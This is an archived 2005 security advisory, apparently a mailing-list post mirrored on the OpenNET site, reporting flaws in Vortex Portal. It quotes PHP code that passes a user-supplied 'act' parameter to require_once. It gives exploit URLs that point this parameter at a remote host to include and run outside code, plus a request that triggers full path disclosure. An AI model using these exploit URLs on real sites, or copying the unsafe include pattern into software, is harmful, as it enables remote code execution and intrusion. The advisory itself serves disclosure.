The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


Vortex Portal


<< Previous INDEX Search src Set bookmark Go to bookmark Next >>
Date: 23 Mar 2005 12:23:43 -0000
From: Francisco Alisson <dominusvis@click21.com.br.>
To: [email protected]
Subject: Vortex Portal
X-Virus-Scanned: antivirus-gw at tyumen.ru



Vortex Portal Multiples Bugs

Vendor: http://www.VortexPortal.net
Contact: Brian Price							 Email: [email protected]

I. Remote File Inclusion:

content.php -->

...
if (!isset($act)) {
        require_once("main.php");
} else {
        require_once("$act.php");
...
?>

index.php -->
...
require_once($root_dir."/content.php");
...

Exploits
 http://&#091;target-host]/index.php?act=http://&#091;host]/file
 http://&#091;target-host]/content.php?act=http://&#091;host]/file

II. Full Path Disclosure
 http://&#091;target-host]/content.php?act=something-wrong
 and we've get :

 Warning: main(something-wrond.php): failed to open stream: No such file or directory in /home/*/content.php on line 9

 Fatal error: main(): Failed opening required 'something-wrond.php' (include_path='.:/usr/local/lib/php:/usr/lib/php:../:../') in /home/*/content.php on line 9

Ps.: the vendor wasn't informed.

[ Infektion Group ]
 by Dominus_Vis


<< Previous INDEX Search src Set bookmark Go to bookmark Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру